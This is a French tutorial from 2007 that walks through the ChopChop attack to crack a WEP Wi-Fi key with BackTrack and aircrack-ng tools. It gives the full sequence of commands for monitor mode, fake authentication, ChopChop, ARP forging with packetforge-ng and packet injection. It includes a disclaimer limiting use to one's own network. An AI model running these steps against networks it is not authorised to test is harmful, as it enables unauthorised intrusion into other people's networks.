Avant de se lancer dans la sécurité réseau :
Il est formellement interdit de s'introduire dans un réseau sans en avoir eu l'autorisation du propriétaire.
Ce tutoriel a pour unique but de sensibiliser les gens au piratage. Le piratage est un fait grave. Des peines et amendes pourraient être encourues aux petits malins qui utiliseraient ce tutoriel à des fins malhonnêtes.
Toutefois vous avez parfaitement le droit de tester la sécurité de votre réseau et uniquement votre réseau ! Zonegeeks décline toutes responsabilités.
L'attaque ChopChop a pour but d'injecter un faux arp afin de stimuler la production des ivs nécessaire au craquage de votre clé wep. Cette attaque est très efficace lorsqu'une station connectée ne génère pas d'arp.
Comme d'habitude, seule une station connectée (et valide) est pré requis pour tenter l'attaque.
Voir également :
Pour commencer, il faut posséder un Live-CD (CD Bootable) de Linux. Vous pouvez télécharger Backtrack 2 (dernière version) sur ce site.
Vous devez ensuite insérer le CD dans le lecteur de manière à booter sur le CD (vous devez peut-être changer la séquence de boot dans le BIOS).
Attendez ensuite quelques minutes et vous devriez voir cet écran de démarrage :
Login : root
Pass : toor
Une fois logué, entrer la commande startx (attention clavier qzerty donc il faut écrire stqrtx).
Une fois le bureau chargé, changer la langue en cliquant sur l'icône en bas à droite du bureau.
Ouvrez une console (icône en bas à gauche de couleur noire) et c'est parti !
Lancez airmon-ng :
airmon-ng start INTERFACE_WIFI
Pour connaitre son interface wifi, faites seulement airmon-ng.
Lancez airodump-ng :
airodump-ng --write Nom_Fichier_Sortie --channel Canal --encrypt Type_De_Securite INTERFACE_WIFI
-- write : Nom du fichier cap de sortie. Obligatoire
-- channel : Cannal où se situe l'ap (entre 1 et 13). Facultatif.
-- encrypt : Filtre en fonction de la sécutité du réseau (wpa, wep, opn). Faculatatif.
-- bssid : Filtre en fonction d'une adresse MAC d'un réseau. Facultatif.
L'ap visé s'appelle test_wep.
Passons maintenant à la fake authentification.
aireplay-ng -1 30 -e Nom_Du_Reseau -a Bssid_Du_Reseau -h Bssid_De_La_Station INTERFACE WIFI
-1 30 : Indique une fake authentification avec un timeout de 30ms. Obligatoire.
-e : Nom du réseau (colonne ESSID). Obligatoire.
-a : Adresse MAC du réseau (colonne BSSID). Obligatoire.
-h : Adresse MAC de la station (colonne STATION). Obligatoire.
La syntaxe diffère très peu de celle pour l'attaque classique. Nous allons juste rajouter un timeout de 30 millisecondes au lieu de 0.
Vous allez apercevoir cette fois un message « Keep-Alive packet ». Dès que ce message est visible, vous pouvez continuer l'attaque.
Utilisons l'attaque ChopChop (-4) au lieu de l'attaque par injection de packet (-3).
aireplay-ng -4 -b Adresse_Mac_Reseau -h Adresse_Mac_Station INTERFACE_WIFI
-4 : Indique que l'on utilise l'attaque ChopChop. Obligatoire.
-b : Adresse MAC du réseau (colonne BSSID). Obligatoire.
-h : Adresse MAC de la station (colonne STATION). Obligatoire.
Lorsque l'attaque est lancée, le programme "read" des packets. Dès qu'il trouve une trame intéressante, vous apercevez des trucs bizarres (voir screen).
Le programme vous demande si vous souhaitez utiliser cette trame. Répondez naturellement par « y »(Yes).
Un fichier xor se construit. Cela peut prendre plusieurs minutes si vous êtes loin de l'ap. Aireplay-ng va créer deux fichiers (un fichier xor et un fichier cap) portant le même nom mais pas la même extension. Notez bien le nom de ces fichiers. Ils vous seront utiles pour la suite.
Maintenant il faut trouver l'adressage du réseau. Cela ne devrait pas être difficile puisque vous êtes le propriétaire !
Je vous donne quand même la commande pour trouver l'adressage du réseau.
tcpdump -s 0 -n -e -r Fichier_Cap_Creer_Avant
Le fichier cap que vous devez indiquer est celui crée au préalable par l'attaque ChopChop.
Seule l'ip source (station) est visible. Il faut deviner l'ip de destination (le plus souvent c'est 192.168.0.1 ou 192.168.1.1 voire 192.168.0.254 pour les Freebox)
Dans notre cas, on a : 192.168.0.3 (source) et 192.168.0.254 (destination).
Maintenant on va créer notre faux arp que l'on va injecter par la suite. Pour cela, on va utiliser packetforge-ng dont la syntaxe est un peu plus longue.
packetforge-ng -0 -a
Adresse_Mac_Reseau -h Adresse_Mac_Station -k Ip_Source -l
Ip_Destination -y Fichier_Xor_Creer_Avant -w Nom_Fichier_Sortie
-0 : Indique que nous voulons un packet de type arp. Obligatoire.
-a : Adresse MAC du réseau (colonne BSSID). Obligatoire.
-h : Adresse MAC de la station (colonne STATION). Obligatoire.
-k : Ip source trouvée avec tcpdump. Obligatoire.
-l : Ip de destination trouvée avec tcpdump. Obligatoire.
-y : Fichier xor créer auparavant avec l'attaque ChopChop. Obligatoire.
-w : Nom du fichier de sortie c'est à dire le nom du fichier créé. Obligatoire.
Voilà nous y sommes presque ! Voici la syntaxe de l'injection de packets.
aireplay
-3 -e Nom_Du_Reseau -b Bssid_Du_Reseau -h Bssid_De_La_Station -x
Vitesse_Injection -r Fichier_Cap_A_Utiliser INTERFACE_WIFI
-3 : Indique qu'il s'agit d'une injection de packets. Obligatoire.
-e : Nom du réseau. Facultatif.
-b : Adresse MAC du réseau (colonne BSSID). Obligatoire.
-h : Adresse MAC de la station (colonne STATION). Obligatoire.
-x : Vitesse d'injection des packets (entre 100 et 1000). Facultatif.
-r : Fichier cap créé précédemment avec packetforge. Obligatoire.
Normalement si tout se passe bien, les arp augmentent ainsi que les ivs.
La suite est similaire à l'attaque par injection de packets.
Après ce tutoriel, je vous conseille vivement de passer au WPA ...
Copyright © 2007 Fdiedler et Mustang766.Tous droits réservés.
Design © 2007 Hypershade